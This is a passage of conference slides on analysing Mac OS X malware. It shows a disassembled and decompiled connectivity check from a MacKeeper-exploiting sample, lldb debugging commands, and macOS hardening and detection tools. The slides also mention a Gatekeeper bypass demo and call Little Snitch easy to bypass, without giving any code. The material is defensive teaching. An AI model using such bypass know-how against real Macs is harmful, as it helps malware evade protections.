"VirusTotal += Mac OS X execution": blog.virustotal.com/2015/11/virustotal-mac-os-x-execution.html

Page 38:

REVERSING OBJECTIVE-C: UNDERSTANDING SOME BASICS...

internet check (mackeeper exploiter):

    connectedToInternet(void) proc near
        mov  rdi, cs:_OBJC_CLASS_$_NSURL
        mov  rsi, cs:URLWithString ; "URLWithString:"
        lea  rdx, cfstr_google ; "www.google.com"
        mov  rax, cs:_objc_msgSend_ptr
        call rax ; objc_msgSend
        ...

objc_msgSend function; calling convention (System V AMD64 ABI):

    arg  register  name (for objc_msgSend)
    0    RDI       class (the receiver)
    1    RSI       method name (selector)
    2    RDX       1st argument
    3    RCX       2nd argument
    4    R8        3rd argument
    5    R9        4th argument

Page 39:

DECOMPILATION: THERE'S AN APP FOR THAT! (hopper.app, http://www.hopperapp.com)

disassembly; internet check (mackeeper exploiter):

    connectedToInternet(void) proc near
        mov  rdi, cs:_OBJC_CLASS_$_NSURL
        mov  rsi, cs:URLWithString_
        lea  rdx, cfstr_google ; "www.google.com"
        mov  rax, cs:_objc_msgSend_ptr
        call rax
        ...

decompilation; internet check (mackeeper exploiter):

    int connectedToInternet() {
        rax = [NSURL URLWithString:@"http://www.google.com"];
        rdx = rax;
        var_38 = [NSData dataWithContentsOfURL:rdx];
        if(var_38 != 0x0) {
            var_1 = 0x1;
        }
        else {
            var_1 = 0x0;
        }
        rax = var_1 & 0x1 & 0xff;
        return rax;
    }

Page 40:

DEBUGGING: USING LLDB; OS X'S DEBUGGER

common lldb commands (see: "Gdb to LLDB Command Map"):

    command         description                      example
    r               launch (run) the process
    b               breakpoint on function           b system
    br s -a <addr>  breakpoint on a memory address   br s -a 0x10001337
    si / ni         step into / step over
    po              print objective-C object         po $rax
    reg read        print all registers

beginning a debugging session:

    $ lldb newMalware
    (lldb) target create "/Users/patrick/malware/newMalware"
    Current executable set to '/Users/patrick/malware/newMalware' (x86_64).

Page 41:

PART 0X5: HEALTH & HAPPINESS. HOW DO I PROTECT MY PERSONAL MACS?

Page 42:

APPLE'S OS X SECURITY MITIGATIONS? GATEKEEPER, XPROTECT, SIP, CODE-SIGNING, ET AL...

"Security & privacy are fundamental to the design of all our hardware, software, and services" - Tim Cook

‣ "Gatekeeper Exposed" (Shmoocon)

‣ "OS X El Capitan - Sinking the S/h\IP"

‣ "Memory Corruption is for Wussies!" (SyScan)

‣ "Writing Bad@ss OS X Malware" (Blackhat)

‣ "Attacking the XNU Kernel in El Capitan" (BlackHat)

Page 43:

DEMO (GATEKEEPER BYPASS)

only 4 launch items; no 'java' processes; fully patched OS X; gatekeeper enabled

Page 44:

OSXLOCKDOWN: HARDENS OS X & REDUCES ITS ATTACK SURFACE

    # ./osxlockdown
    [PASSED] Enable Auto Update
    [PASSED] Disable Bluetooth
    [PASSED] Disable infrared receiver
    [PASSED] Disable AirDrop
    ...
    osxlockdown 0.9
    Final Score 86%; Pass rate: 26/30

osxlockdown, S. Piper (@0xdabbad00), github.com/SummitRoute/osxlockdown

"built to audit & remediate, security configuration settings on OS X 10.11" - S. Piper

Page 45:

OS X SECURITY TOOL: LITTLE SNITCH FIREWALL

"if [Little Snitch] is found, the malware [OSX/DevilRobber.A] will skip installation and proceed to execute the clean software" - f-secure.com

'snitching

trivial to bypass

security vulnerabilities? yes, stay tuned!

Page 46:

MY PERSONAL SECURITY TOOLS: OBJECTIVE-SEE, BECAUSE "SHARING IS CARING" :)

"No one is going to provide you a quality service for nothing. If you're not paying, you're the product." - f-secure ...as they try to sell things!

+ I should write some OS X security tools to protect my Mac ....and share 'em freely :)

Page 47:

SECURITY TOOLS: OBJECTIVE-SEE(.COM)

KnockKnock

BlockBlock

TaskExplorer

Ostiarius

Hijack Scanner

KextViewr

RansomWhere?

Page 48:

CONCLUSIONS: WRAPPING THIS ALL UP...

Page 49:

CONCLUSIONS & APPLICATION: MAHALO FOR YOUR ATTENTION... Q&A?

learned about: osx malware (iWorm, Crisis, Genieo, etc.); generic detection & analysis

scan & protect! (littlesnitch/firewall)

[email protected] @patrickwardle

Page 50:

credits

images:
- iconmonstr.com
- http://wirdou.com/2012/02/04/is-that-bad-doctor/

resources:
- thesafemac.com
- "Mac OS X & iOS Internals", Jonathan Levin
- http://researchcenter.paloaltonetworks.com/2015/09/more-details-on-the-xcodeghost-malware-and-affected-ios-apps/
- http://baesystemsai.blogspot.ch/2015/06/new-mac-os-malware-exploits-mackeeper.html
- http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf